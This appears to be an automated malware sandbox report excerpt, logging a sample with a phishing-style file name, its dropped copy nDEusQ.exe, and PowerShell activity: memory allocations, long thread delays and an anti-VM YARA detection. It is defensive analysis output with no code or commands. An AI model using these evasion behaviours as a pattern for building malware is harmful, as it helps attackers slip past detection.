Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 2B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 10E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 75F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 85F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 8790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 9790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 9AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: AAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Memory allocated: 4960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 1530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 1670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 7BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 8BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 8D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 9D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: A360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: B360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 14F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 3000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Memory allocated: 2E10000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 599158	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598994	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596279	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 596020	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593438	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593328	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Thread delayed: delay time: 593219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599763
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599590
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598878
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598696
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598483
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598264
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598155
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 598045
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597717
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595967
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594538
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594438
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594328
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 594109
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 593999
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Thread delayed: delay time: 593891

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7318	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1077	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6981	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 580	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Window / User API: threadDelayed 3840	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Window / User API: threadDelayed 5978	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Window / User API: threadDelayed 7288
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Window / User API: threadDelayed 2557

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep count: 7318 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep count: 1077 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8148	Thread sleep count: 3840 > 30	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144	Thread sleep time: -599158s >= -30000s	Jump to behavior
